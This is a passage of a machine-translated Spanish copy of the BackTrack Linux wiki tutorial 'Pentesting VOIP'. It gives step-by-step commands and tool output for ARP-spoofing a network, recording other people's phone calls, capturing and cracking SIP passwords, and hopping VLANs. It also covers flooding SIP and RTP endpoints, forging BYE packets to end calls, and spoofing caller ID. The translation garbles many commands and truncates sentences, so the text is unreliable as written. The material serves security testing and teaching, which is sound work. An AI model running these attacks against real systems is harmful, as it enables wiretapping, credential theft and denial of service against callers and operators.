Durante un ataque MITM xito tendremos que suplantar en ambos sentidos:


arpspoof-t vctima de puerta de enlace
arpspoof-t gateway vctima

Dejaremos que nuestro envenenamiento ARP ejecutarse en segundo plano mientras se realiza una captura con Wireshark.

La captura de trfico y espionaje usando Wireshark


Ahora vamos a encender Wireshark para capturar algo de trfico. Vamos a utilizar el siguiente filtro Wireshark captura:

no transmitir y no multicast y el anfitrin 192.168.1.118

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

17/41

19/02/13

Pentesting VOIP - BackTrack Linux

Ahora vamos a empezar a capturar algo de trfico ... Si bien para olfatear el trfico de usuario "B" ha puesto en marcha el
X-Lite suave en su computadora de escritorio y marc el usuario "A" extensin 200.

Wireshark ha capturado algo de trfico, despus de un tiempo me he detenido el proceso de captura y se guarda las sesion
archivo llamado "sip.pcap".

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

18/41

19/02/13

Pentesting VOIP - BackTrack Linux

Podemos ver que hemos capturado el trfico SIP, pero para esta seccin estn ms interesados
en el trfico RTP, ya que c
datos reales de conversacin.

Wireshark tiene una caracterstica muy bien para decodificar llamadas VoIP capturados los datos en formato de audio rep
Usted puede encontrar esta caracterstica en las estadsticas -> VoIP Calls men.

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

19/41

19/02/13

Pentesting VOIP - BackTrack Linux

Voipong

Voipong es una utilidad que detecta todas las llamadas de voz sobre IP en una tubera, y para aquellos que estn G711 cod
vertederos de conversacin real a archivos de onda diferentes. Es compatible con SIP, H323, protocolo de cliente de Cisc
RTP y RTCP. Voipong se encuentra en retroceso "/ pentest / voip / voipong" directorio Antes de poder utilizar voipong te
que hacer algunos cambios en el archivo voipong.conf:

root @ bt :/ pentest / voip / voipong # nano / etc voipong.conf


soxpath = / usr / bin / sox
networksfile = / pentest / voip / voipong / etc / voipongnets
outdir = / pentest / voip / voipong / salida /
device = eth0 # su tarjeta de interfaz de red nombre

Ahora podemos empezar a capturar voipong algunas conversaciones VoIP


root @ bt :/ pentest / voip / voipong # . / voipong-c / etc voipong.conf-d4-f

Una vez voipong detecta una llamada de telfono se iniciar capturarlo una vez que termine de voipong se detendr el pro
captura y lo hacen a un fichero wave jugable. Toda la conversacin se guardar en el directorio "/ pentest / voip / voipong
carpeta

Reproduccin del archivo:


www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

20/41

19/02/13

Pentesting VOIP - BackTrack Linux

Vomitar

Vomit convierte un telfono Cisco IP RTP conversacin en un archivo de sonido que se puede jugar con los jugadores san
normales. Vomit requiere un archivo de salida de tcpdump. Con el fin de obtener vomitar en marcha tendremos que desca
instalar WavePlay Consguelo aqu: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5

root @ bt: ~ # tar-xzvf WavePlay-20010924.tar.gz


WavePlay-20010924 /
waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root @ bt: ~ # cd WavePlay-20010924
root @ bt: ~ / WavePlay-20010924 # hacer
cc-c-o waveplay.o waveplay.c
waveplay.o cc-o WavePlay
root @ bt: ~ / WavePlay-20010924 # cp WavePlay / usr / bin /
root @ bt :/ pentest / voip / vmito # / vmitos sip.dump r |. WavePlay-S8000-B16-C1

UCsniff

UCSniff es un video de VoIP e IP Seguridad herramienta de evaluacin que integra el software de cdigo abierto que exis
caractersticas tiles, lo que permite VoIP y Video IP propietarios y profesionales de seguridad a prueba rpidamente por
de espionaje no autorizado de VoIP y de vdeo . UCSniff apoya envenenamiento ARP, VLAN Hopping, VLAN descubr
travs de CDP, tiene una capacidad de rastreadores y ms ... Lo considero como un todo en una herramienta de espionaje
un vistazo a algunos ejemplos de uso:
UCSniff puede operar en los modos 2
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

21/41

19/02/13

Pentesting VOIP - BackTrack Linux

El modo monitor - En caso de ser utilizado en un medio compartido donde los telfonos IP conectados a saber: u
punto de acceso inalmbrico, se puede tambin utilizar en un entorno conmutado mediante el establecimiento de
SPAN en un switch Cisco.
Hombre en el modo medio - Este modo tiene 2 modos adicionales que son
Modo de aprendizaje
Modo Dirigido
Preparacin UCSniff por lo que puede ejecutar desde cualquier lugar de dar marcha atrs:

root @ bt :/ tmp # cd instalar

Modo de uso del monitor

root @ bt :/ tmp / ucsniff # ucsniff-i eth0-M


UCSniff 2,1 de partida
Funcionamiento en modo monitor
El archivo de directorio users.txt no puede ser abierto para lectura en el directorio de trabajo
Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo
Escuchando en eth0 ... (Ethernet)
eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2
A partir Unificado oler ...
Advertencia: Asegrese de que usted golpea 'q' cuando haya terminado con este programa.
Advertencia: 'q' re-ARP a las vctimas. Si no lo hace antes de la salida del programa dar lugar a una denegacin de servicio.
SIP llamada en curso. (Extensin 200, ip 192.168.1.104) llamando al (extensin 201, ip 192.168.1.118)
SIP llamada en curso. (Extensin 200, ip 192.168.1.105) llamando al (extensin 201, ip 192.168.1.104)
SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:7-3-dos. Wav '
SIP Call terminado. Conversacin grabada en el archivo '200-Calling-201-5 :2:8-2-dos. Wav '
Cierre de interfaz de texto ...
Unificado olfateando se detuvo.

Podemos parar las sesiones pulsando la tecla Q.

Varios archivos han sido creados por UCSniff: Los archivos de registro - Contiene informacin detallada sobre los archivo
transacciones sip - archivo de captura que se puede ver en Wireshark audio wav - archivos de las conversaciones de audio
root @ bt :/ tmp / ucsniff # ls-l
total de 376
-Rw-r - r -. 1 root root 40854 05 de febrero 05:02 200 Calling-201-5 :2:7-3-ambos wav
-Rw-r - r -. 1 root root 115818 05 de febrero 05:02 200 Calling-201-5 :2:7-3 pcap
-Rw-r - r -. 1 root root 46294 05 de febrero 05:02 200 Calling-201-5 :2:8-2-wav tanto
-Rw-r - r -. 1 root root 103940 05 de febrero 05:02 200 Calling-201-5 :2:8-2 pcap
-Rw-r - r - 1 root root 278 05 de febrero 05:02 call_detail_log
-Rw-r - r - 1 root root 317 05 de febrero 05:02 call_log
-Rw-r - r - 1 root root 10063 05 de febrero 05:02 sip.log
-Rw-r - r - 1 root root 39073 05 de febrero 05:02 sipdump.pcap
-Rw-r - r - 1 root root 0 05 de febrero 05:01 skinny_log

MITM Learning Modo de uso:

Este modo utiliza un protocolo de sealizacin (SIP, Skinny) para asignar extensiones a un direcciones IP. Puede personal
objetivos para interceptar slo direcciones IP especficas o redes. En el siguiente ejemplo se supone que estamos en el UC
VLAN Arp envenenar a todos los hosts de la subred.

root @ bt :/ tmp / ucsniff # ucsniff-i eth0 / / / /


UCSniff 2,1 de partida
Escuchando en eth0 ... (Ethernet)
eth0 -> 00:0 C: 29:84:98: 192.168.1.105 255.255.255.0 B2

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

22/41

19/02/13

Pentesting VOIP - BackTrack Linux

Asignaron al azar a 255 hosts para la digitalizacin de ...


El escaneo de la mscara de red total para 255 hosts ...
* | ================================================ ==> | 100,00%
Vctimas de envenenamiento ARP:
GRUPO 1: NINGUNA (todos los hosts de la lista)
GRUPO 2: ALGUNA (todos los hosts de la lista)
Entrada asignada nuevo objetivo: (IP: 192.168.1.118) -> Extensin 201 y nombre: entrada asignada nuevo objetivo: (IP: 192.168.1.104) -> Extensin 200 y nombre:
SIP llamada en curso. (Extensin 201, ip 192.168.1.118) llamando al (extensin 200, ip 192.168.1.104)
SIP Call terminado. Conversacin grabada en el archivo '201-Calling-200-5 :13:4-2-dos. Wav '
Cierre de interfaz de texto ...
ARP envenenador desactivado.
RE-ARPing las vctimas ...
Unificado olfateando se detuvo.

Si echamos un vistazo a los archivos de registro UCSniff podemos ver los objetivos descubiertos utilizados en el ataque.
root @ bt :/ tmp / ucsniff # cat targets.txt
192.168.1.118,201, sip
192.168.1.104,200, sip

MITM modo de objetivo

Target Mode permite espionaje en una capa superior que slo corrientes aleatorias de audio o la direccin IP de los telfo
que no conocen la extensin. Este modo tiene dos modos secundarios: El usuario Targeted Targeted Conversacin Podem
destinos manualmente a la "targets.txt" archivo en el siguiente formato: xxxx, extensin, sip 192.168.1.118,201, SIP o util
modo de aprendizaje para el descubrimiento automtico hosts

root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T


UCSniff 2,1 de partida
Targets.txt El archivo no se puede abrir para lectura en el directorio de trabajo
No hay objetivos han sido previamente descubierto en el archivo Targets, targets.txt
Por favor, ejecute UCSniff en el modo de aprendizaje, o manualmente editar targets.txt

Una vez que un archivo vlido targets.txt se encuentra, se le pedir que seleccione un modo de escucha:
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T
UCSniff 2,1 de partida
Analizados 2 entradas en el archivo Targets, targets.txt
UCSniff ejecuta en modo de destino. Analizada 2 objetivos previamente descubiertos
Por favor, seleccione un modo de espionaje dirigida:
1. Usuario
Descripcin: interceptar todas las llamadas desde o hacia un punto final determinado.
2. Conversacin
Descripcin: espiar a los flujos de conversacin bidireccional entre dos puntos finales seleccionados.
Por favor, seleccione la opcin (1) o (2):

Si selecciona "Usuario" indica a la herramienta para interceptar todo el trfico entre el Blanco, y el resto de la red.

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

23/41

19/02/13

Pentesting VOIP - BackTrack Linux

En "Conversacin", dos puntos finales se seleccionan y la red es ARP envenenada para interceptar slo el trfico entre lo
usuarios.

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

24/41

19/02/13

Pentesting VOIP - BackTrack Linux

UCSniff incluye las herramientas ms tiles y los ataques de los modos como el salto de VLAN (usando ACE) que se disc
adelante.

Xplico

Aunque Xplico no est en el directorio Backtrack voip herramientas, es una herramienta muy til para capturar trfico SIP
(entre otros protocolos). Xplico se puede encontrar en el Backtrack -> Digital Forensics -> Anlisis Forense de men

En caso de que no est presente en la instalacin Backtrack slo tiene que instalar con el comando siguiente:

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

25/41

19/02/13

Pentesting VOIP - BackTrack Linux

root @ bt: ~ # apt-get install xplico

Xplico se puede utilizar para capturar trfico en tiempo real o importar un archivo PCAP Wireshark captura. De cualquie
Xplico decodificar los paquetes capturados y les montamos en el formato adecuado en nuestro caso ser SIP y RTP.
ejecutar Xplico le pedir que inicie sesin, el nombre de usuario y contrasea por defecto son: xplico

Una vez que haya iniciado sesin para Xplico tendremos que crear un caso

Tendremos que elegir entre una captura vivo o importar un archivo PCAP En este ejemplo vamos a utilizar Xplico para re
captura en vivo (vamos a Arp envenenar nuestros objetivos en segundo plano usando arpspoof). Ahora tendremos que ele
caso y crear una nueva sesin

Al elegir nuestra sesin recin creada veremos nuestra pgina de estadsticas principal con la opcin de elegir nuestro ada
red e iniciar / detener el proceso de captura.

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

26/41

19/02/13

Pentesting VOIP - BackTrack Linux

Aqu hay un ejemplo para el trfico capturado SIP:

Un ejemplo para el trfico RTP decodificado:

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

27/41

19/02/13

Pentesting VOIP - BackTrack Linux

La captura de autenticacin SIP utilizando SIPDump

SIPDump es parte de la suite de herramientas SIPCrack, permite realizar una captura en vivo de autenticacin SIP respue
puede volcar una sesin previamente capturados desde un archivo PCAP. SIPDump uso:

root @ bt :/ pentest / voip / sipcrack # . / sipdump-i eth0


SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------Uso: sipdump [OPCIONES]
= Archivo donde logins capturados se escribir en
Opciones:
-I = Interfaz para escuchar en
-P
= Pcap utilizar el archivo de datos
-M = introducir manualmente los datos de acceso
-F ""= Conjunto libpcap filtro
* Es necesario especificar el archivo de volcado

Vivo para capturar con SIPDump:


root @ bt :/ pentest / voip / sipcrack # . / sipdump-i eth0 auth.txt
SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------* El uso de 'eth0' dev para oler
* Empieza a oler con 'tcp o udp o vlan' filtro de paquetes
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.111 (Usuario: '200 ')

Dumping datos de autenticacin de un archivo PCAP


root @ bt :/ pentest / voip / sipcrack # . / sipdump-p / root / registration.pcap auth.txt
SIPdump 0,3 (MaJoMu | www.codito.de)
--------------------------------------* El uso de pcap file '/ root / registration.pcap' para oler
* Empieza a oler con 'tcp o udp o vlan' filtro de paquetes
* Dumped inicio de sesin desde 192.168.1.104 -> 192.168.1.101 (Usuario: '200 ')
* Al salir, olfate un inicio de sesin

SIPDump a escribir la respuesta al desafo de autenticacin en el archivo especificado que se ve de la siguiente manera:

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

28/41

192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968

Vamos a disscuss agrietamiento estos desafos en el captulo autenticacin contrario.

Atacar autenticacin

SIP puede ser susceptible a dos tipos de ataques de autenticacin, antes de echar un vistazo a estos ataques tipo vamos a e
cmo es un registro SIP y el proceso de autenticacin se lleva a cabo. SIP utiliza una autenticacin implcita que es un me
que utiliza el protocolo HTTP y conocido como HTTP digest. Debido a que SIP es un protocolo basado en ASCII los deta
autenticacin son ordenadas con el fin de evitar el transporte en texto claro. Cuando un cliente SIP (User Agent) quiere au
con un servidor SIP, el servidor genera y enva un desafo digest al cliente, que contiene los siguientes parmetros:

Realm - se usa para identificar las credenciales dentro como mensaje SIP, por lo general es el dominio SIP. Nonce - esta e
cadena md5 nico que es generado por el servidor para cada solicitud de registro que est hecho de un sello de tiempo y u
secreta para asegurar tiene una vida til limitada y no se poda ser utilizado de nuevo. Una vez que el cliente recibe el desa
el usuario introduce sus credenciales el cliente utiliza el nonce para generar una respuesta digest y lo enva de vuelta al ser

Dicho esto, vamos a tratar de descifrar la respuesta digest con el fin de obtener una contrasea vlida de SIP cuenta.

Cracking SIP Digest hashes respuesta

Backtrack ofrece una gran herramienta llamada SIPCrack, Ya hemos discutido cmo capturar una autenticacin vlida SI
compendio de respuestas utilizando SIPDump. SIPCrack se puede encontrar en

root @ bt :/ pentest / voip / sipcrack #

19/02/13

Pentesting VOIP - BackTrack Linux

SIPCrack uso:

root @ bt :/ pentest / voip / sipcrack # . / sipcrack


SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------Uso: sipcrack [opciones] [-s |-w ]
Logins = Archivo que contiene olfate por SIPdump
Opciones:
-S = usar stdin para las contraseas
-W lista de palabras = archivo que contiene todas las claves para tratar de
-P num = print proceso de craqueo contraseas cada n (-w)
(ATENCIN: se ralentiza en gran medida)
* O-w o-s tiene que ser dada

SIPCrack puede funcionar en dos modos:


Ataque de diccionario
STDIN

Ataque de diccionario
Backtrack ofrece algunos diccionarios bsicos que se encuentran en:

root @ bt :/ pentest / passwords / listas de palabras

Sin embargo, para el propsito de este artculo voy a utilizar otra herramienta en la parrilla Crunch retroceder llamada que
para crear diccionarios personalizados. Vamos a utilizar para crear un crujido crujido seis caracteres numricos diccionario
encuentra en:
root @ bt :/ pentest / passwords / crunch #

Crunch de uso:
uso: crunch

[-F / ruta / a / charset.lst charset-name] [-o wordlist.txt] [-t [FIXED] @ @ @ @] [-s Startblock] [-c nmero]

Para el uso crujido detallado comprobar su manual:


root @ bt :/ pentest / passwords / crunch crunch hombre #

Creacin de un diccionario de seis caracteres numricos:

root @ bt :/ pentest / passwords / crunch # . / crunch 6 6-f charset.lst numrico-o / pentest / voip / sipcrack / sipass.txt
Crunch generar ahora 7000000 bytes de datos
Crunch ahora generar 6 MB de datos
Crunch ahora genera 0 GB de datos

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

30/41

19/02/13

Pentesting VOIP - BackTrack Linux

100%

Vamos a utilizar un credenciales previamente capturados por SIPDump sip almacenados en el archivo auth.txt ans sipass.t
diccionario (que hemos creado utilizando crunch)
Descifrando la respuesta Digest:

root @ bt :/ pentest / voip / sipcrack # . / sipcrack-w auth.txt sipass.txt


SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------* Se encuentra Cuentas:
Num Cliente Servidor Hash usuario | contrasea
1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd
* Seleccione la entrada de roer (1 - 1): 1
* Generacin de hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f
* A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd')
* Lista de palabras Cargado: 'sipass.txt'
* A partir de fuerza bruta contra el usuario '200 '(MD5: '3 a33e768ed6f630347f4b511371926bd')
* Se ha intentado 123457 contraseas en 0 segundos
* Contrasea Encontrados: '123456 '
* Actualizacin del archivo de volcado 'auth.txt' ... hecho

Ataque de fuerza bruta con John The Ripper

Para este modo de ataque que usaremos John the ripper para redirigir la salida johns en el archivo FIFO que vamos a alim
SIPCrack. Creacin de un archivo FIFO:

root @ bt :/ tmp # mkfifo sipcrack

Generando contraseas usando john y redirigir la salida a nuestro fichero FIFO, para este ejemplo vamos a generar hasta 6
solamente.
root @ bt: ~ # john
[*] Este script le llevar a / pentest / passwords / jtr /
[*] A partir de ah, ejecute. / John
root @ bt :/ pentest / passwords / JTR # / john -. incremental = dgitos-stdout = 6> / tmp / sipcrack

Utilizando el archivo FIFO para romper la clave:


root @ bt :/ pentest / voip / sipcrack # . / sipcrack-w / tmp / sipcrack auth.txt
SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------* Se encuentra Cuentas:
Num Cliente Servidor Hash usuario | contrasea
1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968
* Seleccione la entrada de roer (1 - 1): 1
* Generacin de hash MD5 esttica ... 0a84f78fde66bb15197eab961462dc2f
* A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968')
* Lista de palabras Cargado: '/ tmp / sipcrack'
* A partir de fuerza bruta contra el usuario '200 '(MD5: '8 edc2d549294f6535070439fb069c968')
* Se ha intentado tres contraseas en 0 segundos
* Contrasea Encontrados: '123456 '
* Actualizacin del archivo de volcado 'auth.txt' ... hecho

Ataques de fuerza bruta SIP Cuentas

Podemos utilizar svcrack que es una parte de la sipvicious suite de herramientas para la fuerza bruta sorbo representa una
cuenta SIP ataque de diccionario (Usted puede agregar un v-o-vv para mostrar ms informacin):
www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
31/41

19/02/13

Pentesting VOIP - BackTrack Linux

cuenta SIP ataque de diccionario (Usted puede agregar un v-o-vv para mostrar ms informacin):

root @ bt :/ pentest / voip / sipvicious # . / svcrack.py-u200-d 192.168.1.104 wordlist.txt


| Extensin | Contrasea |
-----------------------| 200 | 123456 |

Una sola cuenta SIP bruta obligando a:


root @ bt :/ pentest / voip / sipvicious # . / svcrack.py-u200-r100000-999999 192.168.1.104
| Extensin | Contrasea |
-----------------------| 200 | 123456 |

Usar. / Svcrack-h para todos los argumentos disponibles.

VLAN Hopping

Por lo general, el trfico de VoIP se conecta a una VLAN dedicada (Virtual LAN), como vimos en la seccin topologas.
significa que no se puede interceptar el trfico de VoIP por inhalacin e intoxicacin Arp. La razn de ello es que una VL
como una red independiente, tiene su propio dominio de broadcast y rango de IP diferente a la red de datos. VLAN salto e
forma de "saltar" a otra VLAN, por suerte para nosotros Backtrack incluye las herramientas necesarias para llevar a cabo
ataque. Una topologa comn es cuando el telfono IP tiene un built-in "Switch interno", por lo general el PC est conecta
toma PC y el telfono mvil se conecta desde su lan / sw socket con el conmutador de red de la siguiente manera:

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

32/41

19/02/13

Pentesting VOIP - BackTrack Linux

Un conmutador CISCO tpica configuracin de puertos para VoIP se ver algo como:

Switch # conf t
Introduzca los comandos de configuracin, uno por lnea. Terminar con CTRL / Z.
Switch (config) # interface FastEthernet 0/1
Switch (config-if) # switchport access modo
Switch (config-if) # switchport access vlan 10
Switch (config-if) # switchport voz vlan 20

El telfono IP se configurar con la ID de VLAN correspondiente (20) y el trfico de datos PC fluir a travs de la VLAN
de comenzar saltando alrededor, tendremos que activar el soporte para el protocolo 802.1q en Backtrack escribiendo:
root @ bt: ~ # modprobe 8021q

VoIP Hopper

VoIP tolva se utiliza para saltar a la VLAN de voz por comportarse como un telfono IP, soporta conmutadores especfico
compatible con algunos modelos de telfonos IP. Actualmente soporta las marcas como: Cisco, Avaya y Nortel. VoIP tolv
diseado para ejecutarse en Backtrack Linux y actualmente cuenta con las siguientes caractersticas: DHCP Client, gener
CDP, la suplantacin de direcciones MAC y VLAN salto. Voiphopper uso:

root @ bt :/ pentest / voip / voiphopper # . / voiphopper


voiphopper-i <interface>-c {0 | 1 | 2}-a-n-v <VLANID>
Por favor, especifique una opcin de modo de base:
CDP Sniff Mode (-c 0)
Ejemplo: voiphopper-i eth0-c 0
CDP Spoof modo de paquete personalizado (-c 1):
-D (ID de dispositivo)
-P (Port ID)
-C (Capacidades)
-L (Plataforma)
-S (Software)
-U (Duplex)
Ejemplo: voiphopper-i eth0-c 1-E 'SIP00070EEA5086'-P 'Port 1' Host-C-L 'Cisco IP Phone 7940'-S 'P003-08-8-00-1-U
CDP Spoof modo de pre-hechos paquetes (-c 2)
Ejemplo: voiphopper-i eth0-c 2
Avaya modo DHCP Opcin (-a):
Ejemplo: voiphopper-i eth0-a
Modo VLAN Hop (-v ID de VLAN):
Ejemplo: voiphopper-i eth0-v 200
Nortel modo DHCP Opcin (-n):
Ejemplo: voiphopper-i eth0-n

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

33/41

19/02/13

Pentesting VOIP - BackTrack Linux

VoIP Hopper ofrece muchos modos de ataque por favor utiliza el h-para obtener informacin detallada.

Echemos un vistazo a un ejemplo de la inhalacin de CDP y ejecutar un salto de VLAN en la VLAN de voz en un entorno
Ejecutar VoIP Hopper en la interfaz de Ethernet, de la siguiente manera:

root @ bt :/ pentest / voip / voiphopper # . / voiphopper-i eth0-c 0

VoIP Hopper tambin le permite a uno Hop VLAN a VLAN arbitraria, sin oler a CDP. Si usted ya conoce la voz VLAN ID
gustara Hop VLAN a otra VLAN slo tiene que especificar el ID de VLAN.

root @ bt :/ pentest / voip / voiphopper # . / voiphopper-i eth0-v 20


VoIP Hopper 1,00 Ejecucin en modo VLAN Hop ~ Tratar de saltar a la VLAN 2
Aadido VLAN 20 a la interfaz eth0
Intentando dhcp solicitud de nueva interfaz eth0.20
eth0.20 Enlace encap: Ethernet HWaddr 00:0 c: 29:84:98: b2
inet6 addr: fe80 :: 20c: 29ff: FE84: 98b2/64 Alcance: Enlace
UP NOTRAILERS BROADCAST RUNNING MULTICAST MTU: 1500 Mtrica: 1
RX packets: 0 errores: 0 cado: 0 sobrecostos: 0 frame: 0
TX paquetes: 9 errores: 0 cado: 0 sobrecostos: 0 carrier: 0
colisiones: 0 txqueuelen: 0
RX bytes: 0 (0.0 B) TX bytes: 2274 (2.2 KB)

ACE

ACE es una herramienta ms para VLAN salto muy similar a Voiphopper en el uso e incluyen una opcin para descubrir t
servidores de TFTP (servidores de configuracin). ACE uso:

root @ bt :/ pentest / voip / as # . / as


ACE v1.0: Automated corporativa (Datos) Enumerator
Uso: as [-i interface] [-m mac address] [-t servidor tftp direccin ip |-c modo cdp |-v voz vlan id |-r interfaz vlan |-d modo verbose]
-I <interface> (Obligatorio) Interfaz para olfatear / envo de paquetes
-M MAC> (Obligatorio) Direccin MAC del telfono IP vctima
-T <tftp servidor ip> (Opcional) Servidor tftp direccin IP
-C <cdp modo 0|1> (opcional) 0 CDP oler modo, un modo de parodia CDP
-V <Voice vlan <id (Opcional) Introduzca la ID de VLAN de voz
-R <vlan usuario> (opcional) Elimina la interfaz VLAN
-D (Opcional) verbose | modo de depuracin

Puede agregar manualmente un salto de VLAN o utilizar su funcin de descubrimiento


Modo para especificar el ID de VLAN de voz

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

34/41

19/02/13

Pentesting VOIP - BackTrack Linux

Ejemplo: As-i eth0-v 96 m 00:1 E: F7: 28:9 C: 8E


Modo para auto-descubrir ID VLAN de voz en el modo de audicin para CDP
Ejemplo: As-i eth0-c 0-m 00:1 E: F7: 28:9 C: 8E
Modo para auto-descubrir ID VLAN de voz en el modo de suplantacin para CDP
Ejemplo: As-i eth0-c 1-m 00:1 E: F7: 28:9 C: 8E

SUGERENCIA: Para ver la direccin MAC en uso marcha atrs:


root @ bt: ~ # macchanger-s eth0

No importa si se ha utilizado o voiphopper as ahora se puede interceptar el trfico de VoIP con herramientas como "ucsni
especificando que acaba de crear la interfaz.
Por ejemplo:

root @ bt :/ pentest / voip / ucsniff # ucsniff-i eth0.20 / / / /

Denial Of Service

Un ataque de denegacin de servicio en los servicios de VoIP puede hacerlo intil, causando un dao intencional a la red
disponibilidad de los sistemas de VoIP. Este ataque puede ocurrir en dos niveles, ataques de red estndar DoS y ataques e
de VoIP DOS. Generalmente se enviar toneladas de datos por la inundacin de la red para consumir todos sus recursos o
protocolo especfico con el fin de saturar con toneladas de peticiones. Vamos a echar un vistazo rpido de las herramienta
disponibles en Backtrack

Inviteflood

Esta herramienta puede ser utilizada para inundar un objetivo con peticiones INVITE puede ser utilizada para combatir ga
/ apoderados y telfonos SIP.

root @ bt :/ pentest / voip / inviteflood # . / inviteflood


inviteflood - Versin 2.0
09 de junio 2006

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

35/41

19/02/13

Pentesting VOIP - BackTrack Linux

Uso:
Obligatorio interfaz (por ejemplo eth0)
usuario de destino (por ejemplo, "" o john.doe o 5000 o "1 +210-555-1212")
dominio de destino (por ejemplo enterprise.com o una direccin IPv4)
IPv4 addr objetivo de inundacin (ddd.ddd.ddd.ddd)
inundacin etapa (es decir, nmero de paquetes)
Opcional -Una inundacin herramienta "De:" alias (por ejemplo jane.doe)
I-IPv4 direccin IP de origen [por defecto es la direccin IP de la interfaz]
-S srcport (0 - 65535) [por defecto es bien conocido puerto de descarte 9]
-D DestPort (0 - 65535) [por defecto es bien conocido puerto SIP 5060]
-L En lineString utilizado por SNOM [por defecto est en blanco]
-S tiempo de sueo msgs btwn invitar (us)
-H help - imprime este uso
-V modo detallado salida

Una sintaxis de uso bsico es el siguiente:


. / Inviteflood eth0 target_extension target_domain target_ip number_of_packets

Mientras la herramienta mantiene inundando el gateway SIP, al evitar que los usuarios realicen llamadas telefnicas.
inundar el proxy SIP con una extensin inexistente por lo que es la generacin de un 404 no se encuentra slo para mante
ocupado.

Rtpflood

Inundacin RTP se utiliza para inundar un telfono IP de destino con un paquete UDP contiene un dato RTP Con el fin de
ataque con xito utilizando rtpflood necesitar saber el puerto de escucha RTP en el equipo remoto que desea atacar, por
lite sofphone defecto rtp puerto es 8000.

root @ bt :/ pentest / voip / rtpflood # . / rtpflood


uso:. / rtpflood SourceName destinationName srcport DestPort numpackets SSID timestamp seqno

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

36/41

19/02/13

Pentesting VOIP - BackTrack Linux

Iaxflood
IAXFlood es una herramienta para inundar el protocolo IAX2 que es utilizado por el asterisco PBX.

root @ bt :/ pentest / voip / iaxflood # . / iaxflood


de uso:. / iaxflood SourceName numpackets destinationName

Desmontaje
Teardown se utiliza para terminar una llamada mediante el envo de una peticin BYE

. / Desmontaje extensin eth0 sip_proxy 10.1.101.35 CallID ToTag FromTag

Primero usted necesita para capturar una respuesta vlida sorbo OK y utilice su desde y hacia las etiquetas y un valor de
identificador de llamadas vlidas.
SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105; sucursal = z9hG4bKkfnyfaol, recibido = 192.168.1.105; rport = 5060
De: "200" ; Tag = hcykd
Para: "200" ; Tag = as644fe807
Call-ID: jwtgckolqnoylqf @ retroceder
CSeq: 134 REGISTRO
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFIQUE
Compatible con: sustituye
Expira: 3600
Contacto: ; Expires = 3600
Fecha: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

37/41

19/02/13

Pentesting VOIP - BackTrack Linux

Si se especifica la opcin "-v" opcin se puede ver la carga til:

SIP carga til para paquetes:


BYE sip: [email protected]: 5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9; sucursal = 91ca1ba5-98ee-44d5-9170-61c30981c565
De: <sip:192.168.1.104>; tag = hcykd
A: 200 <sip:[email protected]>; tag = as644fe807
Call-ID: jwtgckolqnoylqf @ retroceder
CSeq: 2000000000 BYE
Max-Delanteros: 16
User-Agent: Hacker
Content-Length: 0
Contacto: <sip:192.168.1.105:9>

Suplantacin de identificacin de llamadas

Existen varios mtodos para la identificacin de llamadas spoofing que no vamos a discutir aqu, ya que requiere un conju
diferente de herramientas y equipos que no son relevantes para este propsito artculo. Caller ID Spoofing en SIP es basta
slo tiene que cambiar la peticin SIP "INVITE" de cabecera.

INVITAN SIP: @ 127.0.0.1 SIP/2.0


A: <sip:192.168.1.104>
Via: 192.168.1.104 SIP/2.0/UDP
De: "Hacker Evil"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Delanteros: 20
Contacto: <sip:127.0.0.1>

Vamos a echar un vistazo a una herramienta que ya hemos discutido llamado Inviteflood que se puede utilizar para enviar
invitar peticiones.
